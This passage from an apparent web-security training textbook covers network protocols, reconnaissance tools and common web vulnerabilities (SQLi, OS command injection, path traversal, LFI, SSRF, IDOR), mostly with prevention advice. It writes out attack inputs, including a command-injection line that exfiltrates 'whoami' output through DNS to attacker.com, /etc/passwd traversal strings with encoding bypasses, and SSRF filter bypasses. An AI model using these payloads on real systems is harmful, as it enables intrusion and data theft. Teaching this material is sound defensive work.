connection (e.g., HELO, MAIL FROM, RCPT TO, DATA, QUIT).

2.3.5. Domain Name System (DNS)

Function: DNS translates human-readable domain names (e.g., www.example.com) into IP addresses.

Figure 2. 16

Components:

• DNS Resolver: The client-side service that queries DNS servers.

• DNS Server: Responds to DNS queries with the corresponding IP address for a given domain
name.

27
 • DNS Records: Includes records such as A (address), MX (mail exchange), CNAME (canonical
name), and TXT (text).

Operation:

• Query Resolution: The resolver sends a query to a DNS server, which responds with the IP
address or directs the query to another server if necessary.
• Caching: DNS responses are cached to improve resolution speed and reduce query load on
servers.
• Hierarchy: DNS uses a hierarchical structure with root servers, top-level domain (TLD) servers,
and authoritative servers.

2.3.6. Dynamic Host Configuration Protocol (DHCP)

Function: DHCP automatically assigns IP addresses to devices on a network.

Figure 2. 17

Components:

• DHCP Client: The device requesting an IP address.

• DHCP Server: Assigns IP addresses and other network configuration details to clients.

Operation:

• Discovery: The client broadcasts a DHCPDISCOVER message to find available DHCP servers.
• Offer: Servers respond with DHCPOFFER messages containing available IP addresses.
• Request: The client sends a DHCPREQUEST message to request a specific IP address.
• Acknowledgement: The server confirms the IP address assignment with a DHCPACK message.

28
 2.3.7. Secure Shell (SSH)

Function: SSH provides secure remote access and command execution over an encrypted connection.

Figure 2. 18

Components:

• SSH Client: The software used to initiate a secure connection to an SSH server.
• SSH Server: The software that accepts and responds to SSH client connections.
Operation:

• Authentication: The client authenticates with the server using methods such as passwords,
public keys, or certificates.
• Encryption: All data transmitted between the client and server is encrypted to ensure
confidentiality and integrity.
• Commands: The client can execute commands on the server, transfer files, and perform other
remote management tasks.

Conclusion

Network protocols are essential for enabling communication, data transfer, and network management
in modern computing environments. Each protocol serves a specific purpose, from basic data
transmission and web browsing to secure communication and network diagnostics. Understanding
these protocols and their functions is fundamental for designing, implementing, and troubleshooting
networked systems.

29
 2.4 Network Security

Network security is the practice of protecting a computer network from intrusions, misuse, and
unauthorized access. It encompasses various measures, protocols, and technologies designed to
ensure the confidentiality, integrity, and availability of data transmitted across the network. This
section explores the fundamental concepts, threats, and protective measures associated with network
security.

Figure 2. 19

2.4.1 Fundamental Concepts of Network Security

1. Confidentiality: Ensuring that sensitive information is accessed only by authorized individuals

and entities.
2. Integrity: Protecting data from being altered or tampered with by unauthorized parties.
3. Availability: Ensuring that network services and resources are accessible to authorized users
when needed.
4. Authentication: Verifying the identity of users and devices before granting access to network
resources.
5. Authorization: Granting or denying permissions to users and devices based on their identity
and roles.
6. Non-repudiation: Ensuring that a party cannot deny the authenticity of their signature on a
document or a message that they sent.

30
 2.4.2 Common Network Security Threats

1. Malware: Malicious software such as viruses, worms, trojans, ransomware, and spyware
designed to damage or disrupt systems, steal data, or gain unauthorized access.
2. Phishing: A technique used by attackers to trick individuals into revealing sensitive information
such as usernames, passwords, and credit card numbers.
3. Man-in-the-Middle (MitM) Attacks: An attacker intercepts and potentially alters the
communication between two parties without their knowledge.
4. Denial of Service (DoS) and Distributed Denial of Service (DDoS): Attacks aimed at
overwhelming network resources, making services unavailable to legitimate users.
5. SQL Injection: Exploiting vulnerabilities in web applications to execute malicious SQL commands
that can access, modify, or delete database data.
6. Zero-Day Exploits: Attacks that target vulnerabilities in software that are unknown to the
software vendor or public.
7. Eavesdropping: Unauthorized interception of data being transmitted over the network.

2.4.3 Network Security Measures and Technologies

1. Firewalls: Devices or software applications that control incoming and outgoing network traffic
based on predetermined security rules. They act as a barrier between trusted and untrusted
networks. o Packet Filtering Firewalls: Inspect packets and allow or block them based on
source/destination IP address, port, and protocol.
o Stateful Inspection Firewalls: Monitor the state of active connections and make
decisions based on the state and context of traffic.
o Next-Generation Firewalls (NGFW): Combine traditional firewall features with
advanced functionalities like deep packet inspection, intrusion prevention, and
application awareness.
2. Intrusion Detection Systems (IDS) and Intrusion Prevention Systems (IPS):
o IDS: Monitors network traffic for suspicious activity and alerts administrators to
potential threats.
o IPS: Monitors network traffic and takes proactive steps to block or mitigate detected
threats.
3. Virtual Private Networks (VPNs): Secure connections over the internet that encrypt data
between the client and server, ensuring privacy and data integrity. VPNs are used to create
secure remote access and site-to-site connections.
4. Encryption:
o Transport Layer Security (TLS)/Secure Sockets Layer (SSL): Protocols for encrypting
data in transit, ensuring secure communication over networks.

31
 o IPSec: A suite of protocols for securing internet protocol (IP) communications by
authenticating and encrypting each IP packet.
5. Authentication and Access Control:
o Multi-Factor Authentication (MFA): Requires two or more verification methods to gain
access, such as a password and a biometric scan.
o Role-Based Access Control (RBAC): Grants access to resources based on the user’s role
within an organization.
o Public Key Infrastructure (PKI): Uses pairs of cryptographic keys (public and private) to
verify identities and secure communications.
6. Antivirus and Anti-Malware Software: Detects and removes malicious software from devices,
protecting them from infections and potential damage.
7. Network Segmentation: Dividing a network into smaller segments or subnets to contain and
limit the impact of security breaches.
8. Security Information and Event Management (SIEM): Solutions that provide real-time analysis
of security alerts generated by network hardware and applications, helping to identify and
respond to threats quickly.
9. Endpoint Security: Protects individual devices (endpoints) that connect to the network,
including laptops, desktops, smartphones, and tablets. This includes antivirus, antimalware, and
endpoint detection and response (EDR) solutions.
10. Regular Updates and Patch Management: Ensuring that all network devices, operating
systems, and applications are up-to-date with the latest security patches to protect against
known vulnerabilities.

2.4.4 Best Practices for Network Security

1. Security Policies and Procedures: Establishing and enforcing comprehensive security policies
and procedures to guide employees and administrators in maintaining network security.
2. User Education and Awareness: Training users to recognize and avoid security threats, such as
phishing scams and social engineering attacks.
3. Regular Security Audits and Assessments: Conducting periodic reviews and assessments to
identify vulnerabilities and ensure compliance with security policies.
4. Backup and Recovery Plans: Implementing regular data backups and having a robust disaster
recovery plan to restore operations quickly in case of a security incident.
5. Least Privilege Principle: Granting users and applications the minimum level of access necessary
to perform their functions, reducing the risk of unauthorized access.

32
 Conclusion

Network security is a critical aspect of modern computing, protecting data and resources from a wide
range of threats. By understanding the fundamental concepts, common threats, and protective
measures, organizations can build robust defenses to safeguard their networks and ensure the
integrity, confidentiality, and availability of their data. Implementing best practices and staying
informed about emerging threats and technologies are essential for maintaining a secure network
environment.

33
 Chapter 3: Tools
3.1 gau (GetAllUrls)
o Function: Fetches known URLs for a domain from sources like Wayback Machine, Common
Crawl, AlienVault OTX.
o Use Case: Passive discovery of historical URLs for potential endpoints.
o Installation & Usage:
o go install github.com/lc/gau/v2/cmd/gau@latest
o Example: echo example.com | gau --subs --blacklist png,jpg

3.2 katana
o Function: High-performance crawling and spidering framework.
o Use Case: Automated crawling to discover endpoints, JS files, and parameters.
o Installation & Usage:
o go install github.com/projectdiscovery/katana/cmd/katana@latest
o Example: katana -u https://target.com -jc -kf

3.3 assetfinder
o Function: Finds related domains and subdomains from public sources.
o Use Case: Passive subdomain enumeration.
o Installation & Usage:
o go install github.com/tomnomnom/assetfinder@latest
o Example: assetfinder --subs-only example.com

3.4 subfinder
o Function: Passive subdomain discovery using multiple APIs.
o Use Case: Quickly find valid subdomains with minimal requests to targets.
o Installation & Usage:
o go install github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
o Example: subfinder -d example.com -silent

3.5 ffuf
o Function: Fast web fuzzer for directories, parameters, vhosts.

34
 Use Case: High-speed fuzzing for content discovery.

o Installation & Usage:

go install github.com/ffuf/ffuf@latest

o Example: ffuf -u https://target.com/FUZZ -w wordlist.txt

3.6 arjun (aka gosarjun)

o Function: Python tool that brute-forces hidden HTTP parameters not visible in forms or API
docs

Use Case: Discover undocumented or hidden parameters that can lead to vulnerabilities like IDOR,
SQLi, or data leakage.

Installation & Usage:

pipx install arjun

3.7 gospider
o Function: Fast web spider for crawling URLs, JS links, subdomains, AWS buckets.

Use Case: Find hidden links and assets.

o Installation & Usage:

go install github.com/jaeles-project/gospider@latest

o Example: gospider -s https://target.com -o output

3.8 gobuster
o Function: Brute-force directories, DNS, and virtual hosts.

Use Case: Discover hidden files, folders, and subdomains.

o Installation & Usage:

sudo apt install gobuster

o Example: gobuster dir -u https://target.com -w wordlist.txt

35
 3.9 dirsearch
o Function: Web path scanner to brute-force directories/files.

Use Case: Find hidden files and directories on web servers.

o Installation & Usage:

git clone https://github.com/maurosoria/dirsearch.git

o Example: python3 dirsearch.py -u https://target.com -e php,html,js

4.1 Introduction to Information Gathering

Figure 4. 1

Information gathering extends beyond mere data collection. It is a systematic process involving the acquisition,
arrangement, and evaluation of data, facts, and knowledge from diverse sources using sophisticated tools. The
principles guiding this process are:

•Maintaining simplicity

•Thorough planning

•Collecting reliable data with stringent quality control

•Involving pertinent stakeholders

36
Every piece of collected information supports informed decision-making, strategic planning, and comprehensive
research.

Systematic data collection involves sampling methods and methodical processes for gathering observations or
measurements. Whether researching network protocols or analyzing consumer behavior, the methods used
influence the quality of insights obtained.

4.1.1 What is Information Gathering?

Information gathering is the foundational step in understanding environments, systems, or markets. It bridges
raw data and actionable intelligence.

For more on the difference between information, data, and threat intelligence, refer to: “Threat Intelligence,
Information, and Data: What Is the Difference?”.

4.2 The Information Gathering Process: A Step-by-Step Guide

4.2.1 Identifying Objectives and Defining Scope

• Establish precise objectives

• Define scope through documented goals, deliverables, and tasks

• Identify necessary resources and project schedule

• Anticipate challenges such as cost overruns, delays, and changing requirements

4.2.2 Selecting Appropriate Data Collection Methods

Techniques include:

• Surveys

• Interviews

• Observations

• Focus groups

• Experiments

• Secondary data analysis

37
Choice depends on research goals — surveys are suited for broad insights, while interviews yield qualitative
depth.

4.2.3 Analyzing and Organizing Gathered Data

Key steps:

1. Analyze and categorize data

2. Identify issues and opportunities

3. Use statistical and visualization methods (e.g., regression, time series analysis)

4. Support decision-making

Tools like NLP and machine learning (e.g., Recorded Future) enhance pattern detection and risk mitigation.

4.3 Tactical Tools for Information Gathering

4.3.1 Network Mappers and Port Scanners

Examples: Nmap

Functions:

• Identify open ports and services

• Create network maps

• Detect vulnerable services

4.3.2 Packet Sniffers and Protocol Analyzers

Examples: Wireshark, Tcpdump, PRTG

Functions:

• Capture and analyze live network traffic

• Diagnose network issues

• Store and filter packets for offline review

4.3.3 Domain and IP Research Tools

38
Examples: Dig, Whois, SecurityTrails API

Functions:

• Collect DNS, IP, and network metadata

• Identify misconfigurations and vulnerabilities

• Detect exposed assets

4.4 Advanced Techniques in Information Gathering

4.4.1 Penetration Testing with Metasploit Framework

Used for identifying vulnerabilities, simulating attacks, and evaluating security postures.

4.4.2 Data Mining for In-depth Analysis

Example: Maltego — enables link analysis and real-time data correlation.

4.4.3 Leveraging Search Engines and Online Resources

Examples: Shodan.io, Wayback Machine — provide device metadata and historical internet data.

4.5 Practical Applications

4.5.1 Case Studies

Show real-world impact of effective data collection (e.g., Recorded Future Intelligence Graph).

4.5.2 Cybersecurity
Information gathering aids vulnerability assessment, threat detection, and penetration testing.

4.5.3 Market Research

Used by companies like Starbucks, Apple, McDonald’s, LEGO to understand consumer needs and tailor strategies.

4.6 Ethical Considerations in Information Gathering

• Follow legal and professional guidelines (e.g., ISTI, law enforcement standards)

• Avoid unethical practices like phishing, spyware deployment, or unauthorized access

39
 • Protect privacy and maintain trust.

4.7 Maximizing Efficiency in Information Gathering

• Set clear objectives

• Use effective tools and methodologies

• Continuously refine processes

4.8 Frequently Asked Questions (FAQ)

Q: Example of gathering information?

A: Surveys, interviews, observations, record reviews, experiments.

Q: Another term for “gathering information”?

A: Researching.

Q: Fundamentals of information gathering?

A: Simplicity, planning, reliable data, stakeholder involvement, quality control.

Q: Main steps in the process?

A: Identify objectives, select methods, analyze and organize data.

Q: Examples of advanced techniques?

A: Penetration testing, data mining, search engine analysis.

40
 Chapter 5: vulnerabilities
5.1 Information disclosure vulnerabilities

In this section, we'll explain the basics of information disclosure vulnerabilities and describe how you
can find and exploit them. We'll also offer some guidance on how you can prevent information
disclosure vulnerabilities in your own websites.

Figure 5.1

Learning to find and exploit information disclosure is a vital skill for any tester. You are likely to
encounter it on a regular basis and, once you know how to exploit it effectively, it can help you to
improve your testing efficiency and enable you to find additional, high-severity bugs.

If you're already familiar with the basic concepts behind information disclosure vulnerabilities and just
want to practice exploiting them on some realistic, deliberately vulnerable targets, you can access all of
the labs in this topic from the link below.
5.1.1 What is information disclosure?

Information disclosure, also known as information leakage, is when a website unintentionally reveals
sensitive information to its users. Depending on the context, websites may leak all kinds of information
to a potential attacker, including:

• Data about other users, such as usernames or financial information

41
 • Sensitive commercial or business data
• Technical details about the website and its infrastructure

The dangers of leaking sensitive user or business data are fairly obvious, but disclosing technical
information can sometimes be just as serious. Although some of this information will be of limited use,
it can potentially be a starting point for exposing an additional attack surface, which may contain other
interesting vulnerabilities. The knowledge that you are able to gather could even provide the missing
piece of the puzzle when trying to construct complex, high-severity attacks.

Occasionally, sensitive information might be carelessly leaked to users who are simply browsing the
website in a normal fashion. More commonly, however, an attacker needs to elicit the information
disclosure by interacting with the website in unexpected or malicious ways. They will then carefully
study the website's responses to try and identify interesting behavior.
5.1.2 Examples of information disclosure

Some basic examples of information disclosure are as follows:

• Revealing the names of hidden directories, their structure, and their contents via
a robots.txt file or directory listing
• Providing access to source code files via temporary backups
• Explicitly mentioning database table or column names in error messages
• Unnecessarily exposing highly sensitive information, such as credit card details
• Hard-coding API keys, IP addresses, database credentials, and so on in the source code
• Hinting at the existence or absence of resources, usernames, and so on via subtle differences in
application behavior

In this topic, you will learn how to find and exploit some of these examples and more.
5.1.3How do information disclosure vulnerabilities arise?

Information disclosure vulnerabilities can arise in countless different ways, but these can broadly be
categorized as follows:

42
 • Failure to remove internal content from public content. For example, developer comments in
markup are sometimes visible to users in the production environment.
• Insecure configuration of the website and related technologies. For example, failing to disable
debugging and diagnostic features can sometimes provide attackers with useful tools to help
them obtain sensitive information. Default configurations can also leave websites vulnerable,
for example, by displaying overly verbose error messages.
• Flawed design and behavior of the application. For example, if a website returns distinct
responses when different error states occur, this can also allow attackers to enumerate
sensitive data, such as valid user credentials.

5.1.4 What is the impact of information disclosure vulnerabilities?

Information disclosure vulnerabilities can have both a direct and indirect impact depending on the
purpose of the website and, therefore, what information an attacker is able to obtain. In some cases,
the act of disclosing sensitive information alone can have a high impact on the affected parties. For
example, an online shop leaking its customers' credit card details is likely to have severe consequences.

On the other hand, leaking technical information, such as the directory structure or which third-party
frameworks are being used, may have little to no direct impact. However, in the wrong hands, this
could be the key information required to construct any number of other exploits. The severity in this
case depends on what the attacker is able to do with this information.
5.1.4.1How to assess the severity of information disclosure vulnerabilities

Although the ultimate impact can potentially be very severe, it is only in specific circumstances that
information disclosure is a high-severity issue on its own. During testing, the disclosure of technical
information in particular is often only of interest if you are able to demonstrate how an attacker could
do something harmful with it.

For example, the knowledge that a website is using a particular framework version is of limited use if
that version is fully patched. However, this information becomes significant when the website is using

43
an old version that contains a known vulnerability. In this case, performing a devastating attack could
be as simple as applying a publicly documented exploit.

It is important to exercise common sense when you find that potentially sensitive information is being
leaked. It is likely that minor technical details can be discovered in numerous ways on many of the
websites you test. Therefore, your main focus should be on the impact and exploitability of the leaked
information, not just the presence of information disclosure as a standalone issue. The obvious
exception to this is when the leaked information is so sensitive that it warrants attention in its own
right.
5.1.5 Exploiting information disclosure

We've put together some more practical advice to help you identify and exploit these kinds of
vulnerabilities. You can also practice these techniques using our interactive labs.
5.1.6 How to prevent information disclosure vulnerabilities

Preventing information disclosure completely is tricky due to the huge variety of ways in which it can
occur. However, there are some general best practices that you can follow to minimize the risk of these
kinds of vulnerability creeping into your own websites.

• Make sure that everyone involved in producing the website is fully aware of what information is
considered sensitive. Sometimes seemingly harmless information can be much more useful to
an attacker than people realize. Highlighting these dangers can help make sure that sensitive
information is handled more securely in general by your organization.
• Audit any code for potential information disclosure as part of your QA or build processes. It
should be relatively easy to automate some of the associated tasks, such as stripping developer
comments.
• Use generic error messages as much as possible. Don't provide attackers with clues about
application behavior unnecessarily.
• Double-check that any debugging or diagnostic features are disabled in the production
environment.

44
 • Make sure you fully understand the configuration settings, and security implications, of any
third-party technology that you implement. Take the time to investigate and disable any
features and settings that you don't actually need.

5.2 SQL injection

In this section, we explain:

• What SQL injection (SQLi) is.

• How to find and exploit different types of SQLi vulnerabilities.
• How to prevent SQLi.

5.2.1 What is SQL injection (SQLi)?

SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with the
queries that an application makes to its database. This can allow an attacker to view data that
they are not normally able to retrieve. This might include data that belongs to other users, or
any other data that the application can access. In many cases, an attacker can modify or delete
this data, causing persistent changes to the application's content or behavior.

45
 In some situations, an attacker can escalate a SQL injection attack to compromise the underlying
server or other back-end infrastructure. It can also enable them to perform denial-of-service
attacks.

5.2.2 What is the impact of a successful SQL injection attack?

A successful SQL injection attack can result in unauthorized access to sensitive data, such as:

• Passwords.
• Credit card details.
• Personal user information.

SQL injection attacks have been used in many high-profile data breaches over the years. These
have caused reputational damage and regulatory fines. In some cases, an attacker can obtain a
persistent backdoor into an organization's systems, leading to a long-term compromise that can
go unnoticed for an extended period.

5.2.3 How to detect SQL injection vulnerabilities

You can detect SQL injection manually using a systematic set of tests against every entry point in
the application. To do this, you would typically submit:

• The single quote character ' and look for errors or other anomalies.
• Some SQL-specific syntax that evaluates to the base (original) value of the entry point, and to a
different value, and look for systematic differences in the application responses.
• Boolean conditions such as OR 1=1 and OR 1=2, and look for differences in the application's
responses.
• Payloads designed to trigger time delays when executed within a SQL query, and look for
differences in the time taken to respond.
• OAST payloads designed to trigger an out-of-band network interaction when executed within a
SQL query, and monitor any resulting interactions.

46
 Alternatively, you can find the majority of SQL injection vulnerabilities quickly and reliably using
Burp Scanner.

SQL injection in different parts of the query

Most SQL injection vulnerabilities occur within the WHERE clause of a SELECT query. Most
experienced testers are familiar with this type of SQL injection.

However, SQL injection vulnerabilities can occur at any location within the query, and within
different query types. Some other common locations where SQL injection arises are:

• In UPDATE statements, within the updated values or the WHERE clause.

• In INSERT statements, within the inserted values.
• In SELECT statements, within the table or column name.
• In SELECT statements, within the ORDER BY clause.

5.2.4SQL Injection Examples

1. Retrieving hidden data – Modify queries (e.g., adding -- to comment out filters or OR 1=1 to
bypass conditions) to expose restricted or unreleased data.
2. Subverting application logic – Alter queries (e.g., administrator'--) to bypass authentication
checks.
3. UNION attacks – Append queries with UNION SELECT to extract data from other tables (e.g.,
usernames and passwords).
4. Blind SQL injection – Infer data without direct query results using Boolean conditions, time
delays, or out-of-band interactions (OAST).
5. Second-order SQL injection – Malicious input is stored safely at first but later reused in a
vulnerable query.
6. Examining the database – Use SQL queries to identify DB type, version, tables, and columns;
techniques vary by platform.

47
 7. SQL injection in different contexts – Injection possible via any input (query strings, JSON, XML).
Encoding can bypass filters.
8. Prevention – Use parameterized (prepared) statements for all untrusted data; whitelist
table/column names when needed. Avoid string concatenation entirely.

5.3 OS command injection

In this section, we explain what OS command injection is, and describe how
vulnerabilities can be detected and exploited. We also show you some useful
commands and techniques for different operating systems, and describe how to
prevent OS command injection.

5.3.1 What is OS command injection?

OS command injection is also known as shell injection. It allows an attacker to

execute operating system (OS) commands on the server that is running an
application, and typically fully compromise the application and its data. Often, an
attacker can leverage an OS command injection vulnerability to compromise other
parts of the hosting infrastructure, and exploit trust relationships to pivot the attack to
other systems within the organization.

48
5.3.2 Basic Example
Application calls a shell command with user input:
stockreport.pl 381 29
Attacker injects: & echo aiwefwlguh &
& separates commands so injected code runs even if original command errors.

5.3.3 Useful Commands After Finding Injection

Linux: whoami, uname -a, ifconfig, netstat -an, ps -ef
Windows: whoami, ver, ipconfig /all, netstat -an, tasklist

5.3.4 Blind OS Command Injection Techniques

• Time delays: & ping -c 10 127.0.0.1 & confirms execution by response lag.
• Output redirection: & whoami > /var/www/static/whoami.txt & then fetch file via
browser.
• OAST: & nslookup attacker.com & to trigger DNS/HTTP to attacker.
• OAST with data exfiltration: & nslookup \whoami`.attacker.com &` sends output
in DNS request.

5.3.5 Shell Metacharacters for Injection

Windows & Unix: & && | ||
Unix only: ; newline (\n)
Inline execution (Unix): `command`, $(command)

5.3.6 Quoted Context Issues

If input in quotes, attacker closes them (' or ") before injecting.

5.3.7 Prevention

• Avoid shell calls; use safer APIs

• Whitelist permitted values
• Validate numeric only when possible
• Allow only alphanumeric without whitespace/special characters
• Never rely on escaping shell metacharacters

5.4 Path traversal

In this section, we explain:

49
 • What path traversal is.
• How to carry out path traversal attacks and circumvent common obstacles.
• How to prevent path traversal vulnerabilities.

5.4.1 What is path traversal?

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read
arbitrary files on the server that is running an application. This might include:

• Application code and data.

• Credentials for back-end systems.
• Sensitive operating system files.

In some cases, an attacker might be able to write to arbitrary files on the server, allowing them to
modify application data or behavior, and ultimately take full control of the server.

5.4.2 Basic Path Traversal

App loads images via /loadImage?filename=218.png from /var/www/images/. No filtering → attacker
requests ../../../etc/passwd → resolves to /etc/passwd. Windows variant: ..\..\..\windows\win.ini.

50
 5.4.3 Obstacles & Bypasses
• Absolute path bypass: Directly request /etc/passwd.
• Nested traversal: Use ....// or ....\/ if ../ stripped once.
• Encoding bypass: URL encode (%2e%2e%2f), double encode (%252e%252e%252f), or use non-standard
(..%c0%af, ..%ef%bc%8f).
• Superfluous decode bypass: If server URL-decodes multiple times, encoded traversal may survive.
• Base folder prefix bypass: /var/www/images/../../../etc/passwd.
• Extension check bypass: Null byte injection (../../../etc/passwd%00.png).

5.4.4 Prevention

• Avoid passing user input to filesystem APIs.

• If unavoidable:

o Validate: Use whitelist or restrict to safe chars (e.g., alphanumeric).

o Canonicalize & verify: Append input to base dir, canonicalize, ensure canonical path
starts with base dir.

o Example in Java

5.5 Local File Inclusion (LFI)

A file inclusion vulnerability in PHP-based sites occurs when user input for file location is not trusted.
Allows attackers to access arbitrary files.

51
 Example Vulnerable PHP Code:

5.5.1 How LFI Works

• $file variable holds the requested file name.

• $_GET['page'] retrieves file/page from server.
• If unvalidated, attacker can manipulate it.
• Example vulnerable URL:
o Normal: http://vulnerable_host/preview.php?file=abc.html
o Malicious: http://vulnerable_host/preview.php?document=../../../../etc/passwd

5.5.2 Identifying LFI

• Check parameters that reference files (e.g., /fi/?page=include.php).

• If include.php is in /var/www/dvwa/vulnerabilities/lfi/, adding ../../../index.php accesses files
outside intended folder.

5.5.3 LFI Attack Scenarios

• Include files parsed by interpreter.

• Include files printed to page.
• Include files served as downloads.

5.5.4 Impacts of LFI

• Disclosure of sensitive files.

• Database passwords.
• Access to logs.

52
 • Potential full system compromise.

5.5.5 LFI Remediation

• Do not allow direct file path modification. Use hardcoded path list.
• Restrict filename characters to safe set (a-z, 0-9).
• Limit inclusions to specific directories.
• Prevent directory traversal in file handling.

5.6 Server-side request forgery (SSRF)

In this section we explain what server-side request forgery (SSRF) is, and describe some
common examples. We also show you how to find and exploit SSRF vulnerabilities.
5.6.1 What is SSRF?

Server-side request forgery is a web security vulnerability that allows an attacker to cause the
server-side application to make requests to an unintended location.

In a typical SSRF attack, the attacker might cause the server to make a connection to internal-
only services within the organization's infrastructure. In other cases, they may be able to force
the server to connect to arbitrary external systems. This could leak sensitive data, such as
authorization credentials.

53
 5.6.2 What is the impact of SSRF attacks?

A successful SSRF attack can often result in unauthorized actions or access to data within the
organization. This can be in the vulnerable application, or on other back-end systems that the
application can communicate with. In some situations, the SSRF vulnerability might allow an
attacker to perform arbitrary command execution.

An SSRF exploit that causes connections to external third-party systems might result in malicious
onward attacks. These can appear to originate from the organization hosting the vulnerable
application.

5.6.3 Common SSRF attacks

SSRF attacks often exploit trust relationships to escalate an attack from the vulnerable
application and perform unauthorized actions. These trust relationships might exist in relation
to the server, or in relation to other back-end systems within the same organization.

SSRF attacks against the server

54
 In an SSRF attack against the server, the attacker causes the application to make an HTTP
request back to the server that is hosting the application, via its loopback network interface.
This typically involves supplying a URL with a hostname like 127.0.0.1 (a reserved IP address that
points to the loopback adapter) or localhost (a commonly used name for the same adapter).

For example, imagine a shopping application that lets the user view whether an item is in stock
in a particular store. To provide the stock information, the application must query various back-
end REST APIs. It does this by passing the URL to the relevant back-end API endpoint via a front-
end HTTP request. When a user views the stock status for an item, their browser makes the
following request:

POST /product/stock HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 118

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26store
Id%3D1

This causes the server to make a request to the specified URL, retrieve the stock status, and
return this to the user.

In this example, an attacker can modify the request to specify a URL local to the server:

POST /product/stock HTTP/1.0

Content-Type: application/x-www-form-urlencoded

Content-Length: 118

55
 stockApi=http://localhost/admin

The server fetches the contents of the /admin URL and returns it to the user.

An attacker can visit the /admin URL, but the administrative functionality is normally only
accessible to authenticated users. This means an attacker won't see anything of interest.
However, if the request to the /admin URL comes from the local machine, the normal access
controls are bypassed. The application grants full access to the administrative functionality,
because the request appears to originate from a trusted location.

5.6.4 SSRF Attacks Against Other Back-End Systems

In some cases, the application server interacts with back-end systems not directly reachable by
users, often with private IP addresses. These internal systems usually have weaker security and
may allow unauthenticated access.

For example, an admin interface at https://192.168.0.68/admin can be accessed via SSRF by

submitting:

5.6.5 Circumventing Common SSRF Defenses

Applications often have SSRF defenses, which can often be bypassed.

SSRF with Blacklist-Based Input Filters

56
 • Filters block hostnames like 127.0.0.1, localhost, or URLs like /admin.
• Bypass techniques include:
o Using alternative IP representations (e.g., 2130706433, 017700000001, or 127.1).
o Registering a domain resolving to 127.0.0.1 (e.g., spoofed.burpcollaborator.net).
o Obfuscating blocked strings via URL encoding or case variation.
o Using URLs that redirect to the target, switching protocols (http → https) to bypass
filters.

5.6.6 SSRF with Whitelist-Based Input Filters

• Filters only allow inputs matching a whitelist.

• Bypass by exploiting URL parsing quirks:
o Embedding credentials before hostname: https://expected-host:fakepassword@evil-
host
o Using URL fragments: https://evil-host#expected-host
o Using DNS hierarchy: https://expected-host.evil-host
o URL-encoding or double-encoding characters to confuse parsers.
• Combining these techniques increases chances of bypass.

5.6.7 A New Era of SSRF: Bypassing Filters via Open Redirection

• Some applications validate URLs strictly but rely on APIs that follow redirects.
• If allowed URLs contain open redirect vulnerabilities, SSRF filters can be bypassed.
• Example:
o URL /product/nextProduct?currentProductId=6&path=http://evil-user.net redirects to
http://evil-user.net.

57
 • The application validates stockApi as allowed domain, then follows redirect to internal URL.

5.6.8 Blind SSRF Vulnerabilities

• Occur when the application makes a back-end request but does not return the response.
• Harder to exploit but can lead to remote code execution or access to back-end systems.

5.6.9 Finding and Exploiting Blind SSRF

• Easier to find when full URLs are part of request parameters.

• Harder when partial URLs or hostnames are used and combined server-side into full URLs.

5.6.10 SSRF via URLs in Data Formats

• Some data formats (e.g., XML) allow embedded URLs.

• Vulnerable XML parsers might trigger SSRF via XML External Entity (XXE) injection.

5.6.11 SSRF via the Referer Header

• Server-side analytics may fetch and analyze URLs in the Referer header.
• This can create SSRF attack surface if the server makes back-end requests based on Referer.

58
 5.7 Insecure direct object references (IDOR)

In this section, we will explain what insecure direct object references (IDOR) are and describe
some common vulnerabilities.
5.7.1 What are insecure direct object references (IDOR)?

Insecure direct object references (IDOR) are a type of access control vulnerability that arises
when an application uses user-supplied input to access objects directly. The term IDOR was
popularized by its appearance in the OWASP 2007 Top Ten. However, it is just one example of
many access control implementation mistakes that can lead to access controls being
circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege
escalation, but they can also arise in relation to vertical privilege escalation.
5.7.2 IDOR examples
There are many examples of access control vulnerabilities where user-controlled parameter values are used to
access resources or functions directly.

IDOR Vulnerabilities:

• When a website uses user-supplied input (like a customer number in a URL) directly to access database

records without proper checks, attackers can modify this input to access other users' data. This leads

to horizontal privilege escalation (viewing other users’ data) and potentially vertical privilege

escalation (gaining higher privileges).

• Similarly, if sensitive files like chat transcripts are stored with predictable filenames, attackers can

change the filename in the URL to access other users’ files, exposing sensitive information.

Chapter 6:Laps
6.1 SQLI

SQL injection
Vulnerability Explanation:

59
SQLi occurs when user input is improperly handled, allowing attackers to inject and execute
arbitrary SQL commands in a web application's database query.

Severity:
Can lead to full database compromise, data leakage, authentication bypass, or even
remote code execution (in some cases). Impact:
• Unauthorized access to data (usernames, passwords, credit card info)
• Data modification or deletion
• Bypass of authentication mechanisms
• Full database server takeover in advanced cases
• Legal and compliance issues Prevention/Mitigation:
• Use parameterized queries (prepared statements)
• Input validation\sanitization and escaping of special characters
• Apply least privilege to database accounts
• Use Web Application Firewalls (WAFs)
• Regular security testing

5.8 Authentication Bypass

Figure 5.8

Authentication bypass vulnerabilities occur when an attacker is able to gain access to an application or
system without providing valid credentials or by circumventing the normal authentication process. This

60
type of vulnerability can have severe consequences as it grants unauthorized users access to sensitive
data and functionalities.

